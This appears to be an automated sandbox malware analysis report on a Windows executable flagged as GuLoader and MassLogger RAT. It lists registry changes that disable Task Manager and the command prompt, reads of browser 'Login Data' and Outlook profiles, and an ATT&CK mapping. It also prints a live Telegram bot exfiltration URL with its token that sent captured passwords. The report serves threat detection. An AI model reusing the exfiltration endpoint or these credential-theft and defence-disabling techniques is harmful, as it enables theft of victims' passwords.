Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Code function: 0_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004034A5

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Registry value created: DisableTaskMgr 1

Jump to behavior

Disables CMD prompt

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Registry value created: DisableCMD 1

Jump to behavior

Disables the Windows task manager (taskmgr)

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2CQ2zMn0hb.exe PID: 2672, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2CQ2zMn0hb.exe PID: 2672, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\2CQ2zMn0hb.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2CQ2zMn0hb.exe PID: 2672, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2CQ2zMn0hb.exe PID: 2672, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2CQ2zMn0hb.exe PID: 2672, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	31 Disable or Modify Tools	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	215 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Process Injection	2 Obfuscated Files or Information	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	41 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
2CQ2zMn0hb.exe	61%	ReversingLabs	Win32.Trojan.GuLoader
2CQ2zMn0hb.exe	76%	Virustotal		Browse
2CQ2zMn0hb.exe	100%	Avira	HEUR/AGEN.1337946

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsf16D9.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://api.telegram.orgOC	0%	Avira URL Cloud	safe
https://api.telegram	0%	Avira URL Cloud	safe
http://checkip.dyndn	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.181.238	true	false	high
drive.usercontent.google.com	172.217.18.97	true	false	high
reallyfreegeoip.org	104.21.16.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org	2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A5F000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034C47000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034BFB000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034ACA000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.000000003499C000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034987000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	2CQ2zMn0hb.exe, 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065	2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A7D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	2CQ2zMn0hb.exe, 00000003.00000003.2478153692.0000000004490000.00000004.00000020.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.000000000448D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034C47000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034CD1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348C1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034BFB000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034ACA000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A7D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/z	2CQ2zMn0hb.exe, 00000003.00000002.3308028734.0000000037149000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	2CQ2zMn0hb.exe	false		high
http://checkip.dyndns.org/D	2CQ2zMn0hb.exe, 00000003.00000002.3308028734.0000000037149000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.orgOC	2CQ2zMn0hb.exe, 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/-	2CQ2zMn0hb.exe, 00000003.00000002.3308028734.0000000037149000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	2CQ2zMn0hb.exe, 00000003.00000002.3286663082.0000000004428000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram	2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org	2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://apis.google.com	2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndns.com	2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034C47000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034CD1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034BFB000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034ACA000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.telegram.org	2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034C47000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034CD1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034BFB000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034ACA000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A7D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348C1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/q	2CQ2zMn0hb.exe, 00000003.00000003.2478153692.0000000004490000.00000004.00000020.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.000000000448D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://checkip.dyndn	2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reallyfreegeoip.org/xml/	2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348F1000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.181.238	drive.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.16.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
172.217.18.97	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588141
Start date and time:	2025-01-10 21:51:52 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2CQ2zMn0hb.exe renamed because original name is a hash value
Original Sample Name:	df4f955eb7e72870bf18d39f3dfe1fad5fb9093a080e65f315d215bfec94cc2f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/8@6/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 157 Number of non-executed functions: 115
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
15:53:34	API Interceptor	70818x Sleep call for process: 2CQ2zMn0hb.exe modified
21:52:34	Task Scheduler	Run new task: {DF348DEC-E6EB-455E-ABB0-556C35E4E235} path: .

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
104.21.16.1	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.kkpmoneysocial.top/86am/
104.21.16.1	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
132.226.247.73	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	eLo1khn7DQ.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	v3tK92KcJV.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	New Order-090125.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
	hZbkP3TJBJ.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
reallyfreegeoip.org	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	hZbkP3TJBJ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
api.telegram.org	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	gKvjKMCUfq.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.48.1
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	HGhGAjCVw5.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
UTMEMUS	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	ppISxhDcpF.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	CvzLvta2bG.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	xom6WSISuh.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	oEQp0EklDb.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	FylY1FW6fl.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	hZbkP3TJBJ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
3b5074b1b5d032e5620f69f9f700ff0e	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	SABXJ1B5c8.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	HGhGAjCVw5.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	ajRZflJ2ch.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	FUEvp5c8lO.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	http://diebinjmajbkhhg.top/1.php?s=527	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	6mGpn6kupm.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.18.97 142.250.181.238
	v4nrZtP7K2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.18.97 142.250.181.238
	xXUnP7uCBJ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.18.97 142.250.181.238
	4UQ5wnI389.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.217.18.97 142.250.181.238
